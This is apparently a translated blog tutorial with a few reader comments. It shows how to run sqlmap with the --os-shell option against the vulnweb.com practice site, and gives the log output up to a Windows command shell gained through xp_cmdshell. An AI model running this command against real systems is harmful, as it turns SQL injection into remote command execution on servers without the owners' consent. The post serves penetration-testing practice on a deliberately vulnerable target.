Taking Over the Operating System Using Sqlmap
https://kaligunlugu.blogspot.com/2015/02/sqlmap-kullanarak-isletim-sistemi-ele.html
Objective: Using a SQL injection vulnerability to take over the target at the operating-system level.
Tools used:
- Sqlmap
Step 1: Take over the operating system with sqlmap using the --os-shell parameter.
root@kali:~# sqlmap -u 'http://testasp.vulnweb.com/showforum.asp?id=0' --os-shell
...
...
[20:52:18] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005
[20:52:18] [INFO] testing if current user is DBA
[20:52:18] [WARNING] functionality requested probably does not work because the curent session user is not a database administrator. You can try to use option '--dbms-cred' to execute statements as a DBA user if you were able to extract and crack a DBA password by any mean
[20:52:18] [WARNING] time-based comparison requires larger statistical model, please wait..............................
[20:52:36] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
[20:52:37] [INFO] testing if xp_cmdshell extended procedure is usable
[20:52:38] [INFO] heuristics detected web page charset 'ascii'
[20:52:38] [WARNING] the SQL query provided does not return any output
[20:52:38] [WARNING] the SQL query provided does not return any output
[20:52:38] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[20:52:38] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[20:52:42] [INFO] xp_cmdshell extended procedure is usable
[20:52:42] [INFO] going to use xp_cmdshell extended procedure for operating system command execution
[20:52:42] [INFO] calling Windows OS shell. To quit type 'x' or 'q' and press ENTER
os-shell>
I hope there is a suitable vulnerability for Mac too :)
Sorry. The aim is to take over the target "site" at the operating-system level :)
Nothing was done here other than typing a command :D I respect the effort, but this turned out extremely superficial.